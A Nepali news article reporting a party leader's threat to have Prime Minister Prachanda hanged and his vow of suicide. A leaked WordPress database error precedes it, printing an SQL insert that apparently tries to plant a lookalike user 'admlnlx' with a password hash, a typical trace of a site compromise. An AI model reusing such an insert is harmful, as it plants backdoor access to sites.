WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BClKA7XO.cibrMRH3Mqi6DXtskSu/M1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 07:51:28', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ १६ –
राष्ट्रिय शिवसेना पार्टीका अध्यक्ष बिक्रम बमले प्रधानमन्त्री तथा नेकपा माओबादी केन्द्रका अध्यक्ष पुष्पकमल दाहाल ‘प्रचण्ड’लाई फाँसी दिने चेतावनी दिएका छन्
नेपाल राष्ट्रिय बोर्डिङ स्कुल भाडा बस व्यवसायी संघले शनिबार सातदोबाटोमा आयोजना गरेका एक अन्तरक्रिया कार्यक्रममा बोल्दै अध्यक्ष बमले प्रचण्डले भारतको एयरमार्सल नेपालको एयरपोर्टमा राखेर देशलाई सिक्किमीकरण गर्न खोजेको आरोप लगाए ।
उनले देश विभाजन गर्न भूमिका खेलिरहेका प्रचण्डलाई फाँसी दिने नसके आफै आत्महत्या गर्ने घोषणा समेत गरे । अहिलेको संविधानले देशलाई विखण्डन र विभाजन र्फ लैजाने भएकाले यसले मजदुरहरुको पनि हित गर्न नसकेको बताए ।
प्रचण्डले सुकुम्बासी जनतालाई विस्थापित गरेर नयाँ व्यवसायी खडा गर्दै पुराना स्वरोजगार यातायात व्यवसायीलाई विस्तापित गर्ने योजना बनाएको उनको आरोप छ ।